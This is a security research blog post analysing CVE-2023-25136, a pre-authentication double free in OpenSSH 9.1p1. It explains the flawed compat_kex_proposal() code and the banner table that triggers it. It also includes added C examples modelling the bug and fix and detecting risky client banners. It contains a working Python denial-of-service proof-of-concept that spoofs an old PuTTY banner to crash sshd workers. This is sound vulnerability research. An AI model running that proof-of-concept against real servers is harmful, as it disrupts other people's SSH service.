Source: https://jfrog.com/blog/openssh-pre-auth-double-free-cve-2023-25136-writeup-and-proof-of-concept/
# OpenSSH Pre-Auth Double Free - CVE-2023-25136 - Writeup and Proof-of-Concept

By Yair Mizrahi, Senior Security Researcher, JFrog Security Research. February 8, 2023. 8 min read.

OpenSSH's newly released version 9.2p1 contains a fix for a double-free vulnerability. Given the severe potential impact of the vulnerability on OpenSSH servers (DoS/RCE) and OpenSSH's high popularity in the industry, this security fix prompted the JFrog Security Research team to investigate the vulnerability. This blog post provides details on the vulnerability, who is affected, and a proof-of-concept that triggers it to cause a Denial of Service (DoS).

## What is OpenSSH?

OpenSSH is a popular tool for secure communication and remote access. It was developed as a free, open-source implementation of the Secure Shell (SSH) protocol and is widely used for various applications. OpenSSH provides a secure, encrypted connection between two untrusted hosts over an insecure network, making it an essential tool for remote access and secure file transfer. With the increasing use of cloud computing and remote access to servers, OpenSSH has become a crucial tool for system administrators and developers who need to access and manage remote systems securely. OpenSSH also supports a wide range of platforms including Linux, macOS, and Windows, making it a widely adopted tool across different operating systems.
With its ease of use and strong security features, OpenSSH has become an industry-standard tool for secure remote access.

## Vulnerability Background

On February 2, 2023, OpenSSH released version 9.2p1 together with a security advisory. It immediately became clear that this version is of interest because of the pre-auth double-free vulnerability. Searching OpenSSH's GitHub repository turns up the fix commit. The commit message references bz3522, the Bugzilla issue reported by the user Mantas Mikulenas. In the report, Mantas mentions using the obsolete PuTTY version 0.64 and attaches a backtrace of the double-free abort.

## Research Walkthrough

To dive deeper, we set up an environment with the vulnerable OpenSSH 9.1p1 and pulled a copy of the old PuTTY 0.64, released 8 years ago on February 28, 2015. Trying to connect with PuTTY 0.64 to the vulnerable OpenSSH server returned the following error:

(Screenshot: PuTTY 0.64 Fatal Error)

Since the obsolete client's key exchange algorithms are not supported by the new OpenSSH version, we added the following line to /etc/ssh/sshd_config:

```
KexAlgorithms +diffie-hellman-group1-sha1
```

After restarting the SSH server and trying again, the following error was returned:

(Screenshot: PuTTY Fatal Error)

After adding another configuration line to sshd_config, we were able to connect to the vulnerable OpenSSH server and reproduce the crash:

```
HostKeyAlgorithms +ssh-rsa
```

Running the server in debug mode (using the -ddd flag), the following debug message was returned:

```
ssh_sandbox_violation: unexpected system call (arch:0xc000003e,syscall:20 @ 0x7fd7473fb771) [preauth]
```

Syscall number 20 is writev(), which matches the Bugzilla report.

Note that the configuration changes we made were only needed to reproduce the vulnerability through PuTTY and are not required to exploit it. As we'll see in the PoC, the default configuration is vulnerable.
## Vulnerability In-Depth Details

We started by examining the fix commit, which states that compat_kex_proposal() is responsible for the double free. When the connection compatibility option SSH_OLD_DHGEX is set at [1], the second argument p is assigned to cp at [2] and later freed at [3]:

```c
/* Always returns pointer to allocated memory, caller must free. */
char *
compat_kex_proposal(struct ssh *ssh, char *p)
{
	char *cp = NULL;

	if ((ssh->compat & (SSH_BUG_CURVE25519PAD|SSH_OLD_DHGEX)) == 0)
		return xstrdup(p);
	debug2_f("original KEX proposal: %s", p);
	if ((ssh->compat & SSH_BUG_CURVE25519PAD) != 0)
		if ((p = match_filter_denylist(p,
		    "curve25519-sha256@libssh.org")) == NULL)
			fatal("match_filter_denylist failed");
	if ((ssh->compat & SSH_OLD_DHGEX) != 0) {		/* [1] */
		cp = p;						/* [2] */
		if ((p = match_filter_denylist(p,
		    "diffie-hellman-group-exchange-sha256,"
		    "diffie-hellman-group-exchange-sha1")) == NULL)
			fatal("match_filter_denylist failed");
		free(cp);					/* [3] */
	}
	debug2_f("compat KEX proposal: %s", p);
	if (*p == '\0')
		fatal("No supported key exchange algorithms found");
	return p;
}
```

Whenever SSH_BUG_CURVE25519PAD is not also set, p still points at the caller's buffer when it is copied to cp, so free(cp) at [3] releases memory the caller owns.

The call to compat_kex_proposal() is inside the do_ssh2_kex() function:

```c
myproposal[PROPOSAL_KEX_ALGS] = prop_kex = compat_kex_proposal(ssh, options.kex_algorithms);
```

The freed cp = p from compat_kex_proposal() therefore refers to the options.kex_algorithms argument. Searching for kex_algorithms in the source code, we encountered assemble_algorithms(), which appears in the crash backtrace of the Bugzilla report:

```c
ASSEMBLE(kex_algorithms, def_kex, all_kex);
```

ASSEMBLE is a macro for calling the kex_assemble_names() function:

```c
#define ASSEMBLE(what, defaults, all) \
	do { \
		if ((r = kex_assemble_names(&o->what, defaults, all)) != 0) \
			fatal_fr(r, "%s", #what); \
	} while (0)
```

kex_assemble_names() is called with the address of o->kex_algorithms as its first argument (listp). This is where the second free occurs.
```c
int kex_assemble_names(char **listp, const char *def, const char *all)
```

Because the options.kex_algorithms handle was already freed and has become a dangling pointer, freeing it again here causes the double free.

But where is the SSH_OLD_DHGEX option set? Inside the compat_banner() function, which determines bug flags from the SSH protocol banner. An array of structs named check[] lists SSH client ID patterns and their flags. The following snippet shows the client IDs that are assigned the SSH_OLD_DHGEX option; it also shows that WinSCP might be able to trigger this behavior.

```c
	{ "PuTTY_Local:*,"		/* dev versions < Sep 2014 */
	  "PuTTY-Release-0.5*,"		/* 0.50-0.57, DH-GEX in >=0.52 */
	  "PuTTY_Release_0.5*,"		/* 0.58-0.59 */
	  "PuTTY_Release_0.60*,"
	  "PuTTY_Release_0.61*,"
	  "PuTTY_Release_0.62*,"
	  "PuTTY_Release_0.63*,"
	  "PuTTY_Release_0.64*",
					SSH_OLD_DHGEX },
	{ "FuTTY*",			SSH_OLD_DHGEX }, /* Putty Fork */
	{ "WinSCP_release_4*,"
	  "WinSCP_release_5.0*,"
	  "WinSCP_release_5.1,"
	  "WinSCP_release_5.1.*,"
	  "WinSCP_release_5.5,"
	  "WinSCP_release_5.5.*,"
	  "WinSCP_release_5.6,"
	  "WinSCP_release_5.6.*,"
	  "WinSCP_release_5.7,"
	  "WinSCP_release_5.7.1,"
	  "WinSCP_release_5.7.2,"
	  "WinSCP_release_5.7.3,"
	  "WinSCP_release_5.7.4",
					SSH_OLD_DHGEX },
```

## Proof-of-Concept

We opted to create a Python denial-of-service proof-of-concept because of its flexibility and portability. The proof-of-concept triggers the double free using the paramiko package and causes an abort crash. paramiko is a widespread Python SSH implementation, providing both server and client functionality. For the PoC we changed the connecting client's version banner to reflect an obsolete client like PuTTY v0.64. The PoC is available in our GitHub repository.
```python
import paramiko

# Address of the test server running the vulnerable OpenSSH 9.1p1.
VICTIM_IP = "127.0.0.1"
# Client ID matching the SSH_OLD_DHGEX entries of sshd's compat table.
CLIENT_ID = "PuTTY_Release_0.64"


def main():
    transport = paramiko.Transport(VICTIM_IP)
    # Override paramiko's default version banner so sshd selects the
    # SSH_OLD_DHGEX compatibility path during key exchange.
    transport.local_version = f"SSH-2.0-{CLIENT_ID}"
    transport.connect(username='', password='')


if __name__ == "__main__":
    main()
```

## Vulnerability Impact

The OpenSSH daemon listens for connections from clients and forks a new daemon for each incoming connection. The forked daemons handle key exchange, encryption, authentication, command execution, and data exchange. The vulnerability is a double free that can be exploited for a denial of service, as demonstrated by our proof-of-concept. Note that only the forked daemons crash, because of a sandbox violation while trying to call writev(), which leaves the main server daemon free to handle new clients. OpenSSH has put security measures in place such as a sandbox and a privilege separation mechanism. Though remote code execution is theoretically possible, it would require deep research to find allocation primitives, and even then it would be less impactful because of those security measures.

The JFrog Security Research team gave this vulnerability a Medium severity rating for the following reasons:

* No prerequisites are required. A default configuration is vulnerable.
* A DoS attack that crashes a forked worker process is much less severe than a DoS that crashes an important daemon, but both receive a "High" Availability impact CVSS rating.
* OpenSSH has put security measures in place such as a sandbox and a privilege separation mechanism.

## Vulnerability Targets

The vulnerability applies only to OpenSSH version 9.1p1 with a default configuration, meaning no prerequisites are required.

## Remediation

It is strongly recommended to upgrade OpenSSH to the latest version, 9.2p1. However, it should be noted again that leveraging this vulnerability for remote code execution is highly complex due to OpenSSH's security measures (e.g. sandboxing).
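The ownership mistake analysed in the In-Depth section, and the shape of its fix, can be reproduced outside sshd. The C program below is an added example written for this page; it is not OpenSSH code and not the fix commit. It models compat_kex_proposal() with a simplified stand-in for match_filter_denylist(), an instrumented free() that records which address was released, and a harness that plays the caller owning options.kex_algorithms. The compat bit values, the sample algorithm list and the helper names are assumptions of this model.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Compat bits named as in the post; the values are this model's assumption. */
#define SSH_BUG_CURVE25519PAD 0x1
#define SSH_OLD_DHGEX         0x2
#define DHGEX_DENYLIST "diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1"
#define SAMPLE_KEX "curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256"

/* Instrumented free(): records the released address (as an integer, never
 * dereferenced) so the harness can see that a callee freed the caller's
 * buffer without ever executing the second free() itself. */
static uintptr_t g_last_freed;
static void tracked_free(void *p) { g_last_freed = (uintptr_t)p; free(p); }

static char *xstrdup(const char *s) {
    size_t n = strlen(s) + 1;
    char *d = malloc(n);
    if (d == NULL) abort();
    return memcpy(d, s, n);
}

/* 1 if the first n bytes of name equal an entry of the comma-separated list. */
static int name_in_list(const char *name, size_t n, const char *list) {
    for (const char *p = list;;) {
        const char *end = strchr(p, ',');
        size_t len = end ? (size_t)(end - p) : strlen(p);
        if (len == n && memcmp(p, name, n) == 0) return 1;
        if (end == NULL) return 0;
        p = end + 1;
    }
}

/* Stand-in for match_filter_denylist(): a fresh allocation holding proposal
 * minus every name in denylist. As in the original, the caller owns the result. */
static char *filter_denylist(const char *proposal, const char *denylist) {
    char *out = malloc(strlen(proposal) + 1);
    size_t pos = 0;
    if (out == NULL) abort();
    for (const char *p = proposal;;) {
        const char *end = strchr(p, ',');
        size_t len = end ? (size_t)(end - p) : strlen(p);
        if (!name_in_list(p, len, denylist)) {
            if (pos > 0) out[pos++] = ',';
            memcpy(out + pos, p, len);
            pos += len;
        }
        if (end == NULL) break;
        p = end + 1;
    }
    out[pos] = '\0';
    return out;
}

/* 9.1p1 shape. With only SSH_OLD_DHGEX set the first filter is skipped, so
 * cp = p still aliases the caller's buffer and free(cp) releases it. */
static char *compat_kex_proposal_vuln(int compat, char *p) {
    char *cp = NULL;
    if ((compat & (SSH_BUG_CURVE25519PAD | SSH_OLD_DHGEX)) == 0)
        return xstrdup(p);
    if ((compat & SSH_BUG_CURVE25519PAD) != 0)
        p = filter_denylist(p, "curve25519-sha256@libssh.org");
    if ((compat & SSH_OLD_DHGEX) != 0) {
        cp = p;
        p = filter_denylist(p, DHGEX_DENYLIST);
        tracked_free(cp);            /* BUG: cp may be the argument itself */
    }
    return p;
}

/* Corrected shape: the argument is const and never freed; each filter writes
 * to its own pointer and only this function's own intermediate is released. */
static char *compat_kex_proposal_fixed(int compat, const char *p) {
    char *cp = NULL, *cp2 = NULL;
    if ((compat & (SSH_BUG_CURVE25519PAD | SSH_OLD_DHGEX)) == 0)
        return xstrdup(p);
    if ((compat & SSH_BUG_CURVE25519PAD) != 0)
        cp = filter_denylist(p, "curve25519-sha256@libssh.org");
    if ((compat & SSH_OLD_DHGEX) != 0) {
        cp2 = filter_denylist(cp != NULL ? cp : p, DHGEX_DENYLIST);
        tracked_free(cp);            /* free(NULL) is a no-op */
        cp = cp2;
    }
    return cp;
}

/* Plays the caller that owns options.kex_algorithms. Returns 1 if the call
 * freed that buffer (the defect behind CVE-2023-25136), else 0. */
int callee_freed_callers_buffer(int use_fixed, int compat) {
    char *options_kex = xstrdup(SAMPLE_KEX);
    uintptr_t owned = (uintptr_t)options_kex;
    char *prop;
    g_last_freed = 0;
    prop = use_fixed ? compat_kex_proposal_fixed(compat, options_kex)
                     : compat_kex_proposal_vuln(compat, options_kex);
    free(prop);
    if (g_last_freed == owned)
        return 1;       /* sshd's later free of options_kex would be the double free */
    free(options_kex);  /* normal ownership: the caller releases its own buffer */
    return 0;
}

/* The fix must keep filtering: both group-exchange methods go, the rest stays. */
int fixed_filters_dhgex(void) {
    char *r = compat_kex_proposal_fixed(SSH_OLD_DHGEX, SAMPLE_KEX);
    int ok = strcmp(r, "curve25519-sha256@libssh.org,diffie-hellman-group14-sha256") == 0;
    free(r);
    return ok;
}

int main(void) {
    printf("vulnerable, SSH_OLD_DHGEX only: caller buffer freed = %d\n",
           callee_freed_callers_buffer(0, SSH_OLD_DHGEX));
    printf("fixed,      SSH_OLD_DHGEX only: caller buffer freed = %d\n",
           callee_freed_callers_buffer(1, SSH_OLD_DHGEX));
    printf("fixed version still filters DH-GEX: %d\n", fixed_filters_dhgex());
    return 0;
}
```

The harness never performs the second free itself; once the callee has released the caller's buffer it simply reports that and stops touching it. In the real daemon that later free is what the sandbox turns into the writev() violation seen in the debug log, and what a build with AddressSanitizer would report as a double free.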
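For defenders, the compat table above answers a practical question: which client banners steer a 9.1p1 server into the SSH_OLD_DHGEX path, and what the resulting crash looks like in sshd's debug output. The C program below is an added example, not code from the post or from OpenSSH. It reimplements the banner lookup with the patterns quoted from check[], using fnmatch(3) in place of OpenSSH's match_pattern_list(), and parses the ssh_sandbox_violation line from the Research Walkthrough to extract the syscall number. Treating the whole remainder of the identification line as the software version is this model's own simplification; the sample banners in main() are constructed.

```c
#include <fnmatch.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* The SSH_OLD_DHGEX entries of compat_banner()'s check[] table, as quoted in
 * the post, flattened into one comma-separated pattern list. */
static const char *const OLD_DHGEX_PATTERNS =
    "PuTTY_Local:*,PuTTY-Release-0.5*,PuTTY_Release_0.5*,PuTTY_Release_0.60*,"
    "PuTTY_Release_0.61*,PuTTY_Release_0.62*,PuTTY_Release_0.63*,PuTTY_Release_0.64*,"
    "FuTTY*,"
    "WinSCP_release_4*,WinSCP_release_5.0*,WinSCP_release_5.1,WinSCP_release_5.1.*,"
    "WinSCP_release_5.5,WinSCP_release_5.5.*,WinSCP_release_5.6,WinSCP_release_5.6.*,"
    "WinSCP_release_5.7,WinSCP_release_5.7.1,WinSCP_release_5.7.2,WinSCP_release_5.7.3,"
    "WinSCP_release_5.7.4";

/* 1 if s matches any comma-separated glob in patterns. fnmatch(3) stands in
 * for OpenSSH's match_pattern_list(); the only wildcard the table uses is '*',
 * which behaves the same in both. */
int match_pattern_list(const char *s, const char *patterns) {
    char pat[256];
    for (const char *p = patterns;;) {
        const char *end = strchr(p, ',');
        size_t len = end ? (size_t)(end - p) : strlen(p);
        if (len < sizeof pat) {
            memcpy(pat, p, len);
            pat[len] = '\0';
            if (fnmatch(pat, s, 0) == 0) return 1;
        }
        if (end == NULL) return 0;
        p = end + 1;
    }
}

/* Takes a client identification line ("SSH-2.0-<software> ...") and reports
 * whether the compat table would give this client the SSH_OLD_DHGEX bit,
 * i.e. whether it would put a 9.1p1 server on the buggy path. Everything
 * after the second dash up to the line end is treated as the software version
 * (this model's assumption). */
int banner_sets_old_dhgex(const char *banner) {
    char version[256];
    const char *sw;
    size_t len;
    if (strncmp(banner, "SSH-", 4) != 0) return 0;
    sw = strchr(banner + 4, '-');          /* skip the protocol version, e.g. "2.0" */
    if (sw == NULL) return 0;
    sw++;
    len = strcspn(sw, "\r\n");
    if (len >= sizeof version) return 0;
    memcpy(version, sw, len);
    version[len] = '\0';
    return match_pattern_list(version, OLD_DHGEX_PATTERNS);
}

/* Returns the syscall number from an sshd "ssh_sandbox_violation" debug line
 * (20 is writev() in the post's x86-64 trace), or -1 for any other line. */
int sandbox_violation_syscall(const char *logline) {
    const char *p = strstr(logline, "ssh_sandbox_violation:");
    if (p == NULL) return -1;
    p = strstr(p, "syscall:");
    if (p == NULL) return -1;
    return (int)strtol(p + strlen("syscall:"), NULL, 10);
}

int main(void) {
    /* Constructed sample banners and the debug line quoted in the post. */
    const char *banners[] = {
        "SSH-2.0-PuTTY_Release_0.64",
        "SSH-2.0-PuTTY_Release_0.78",
        "SSH-2.0-WinSCP_release_5.7.3",
        "SSH-2.0-OpenSSH_9.2",
        "SSH-2.0-FuTTY",
    };
    const char *line = "ssh_sandbox_violation: unexpected system call "
                       "(arch:0xc000003e,syscall:20 @ 0x7fd7473fb771) [preauth]";
    for (size_t i = 0; i < sizeof banners / sizeof banners[0]; i++)
        printf("%-30s SSH_OLD_DHGEX: %s\n", banners[i],
               banner_sets_old_dhgex(banners[i]) ? "yes" : "no");
    printf("sandbox violation syscall: %d\n", sandbox_violation_syscall(line));
    return 0;
}
```

Feeding the first function the client version strings recorded by an SSH gateway or bastion shows which clients in a fleet would still trigger the compat path on an unpatched 9.1p1 server; the second function is the kind of check that turns the -ddd message into a log-based detection of the worker crash.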
## Is the JFrog Platform Vulnerable?

After conducting internal research, we can confirm that the JFrog DevOps Platform is not vulnerable to OpenSSH's CVE-2023-25136.

## Stay up-to-date with JFrog Security Research

The security research team's findings and research play an important role in improving the JFrog Platform's application software security capabilities. This manifests as enhanced CVE metadata and remediation advice for developers, DevOps and security teams in the JFrog Xray vulnerability database, and as new security scanning capabilities used by JFrog Xray. Follow the latest discoveries and technical updates from the JFrog Security Research team on our research website, in our security research blog posts, and on Twitter at @JFrogSecurity.

Tags: proof-of-concept, double-free, openssh, security-research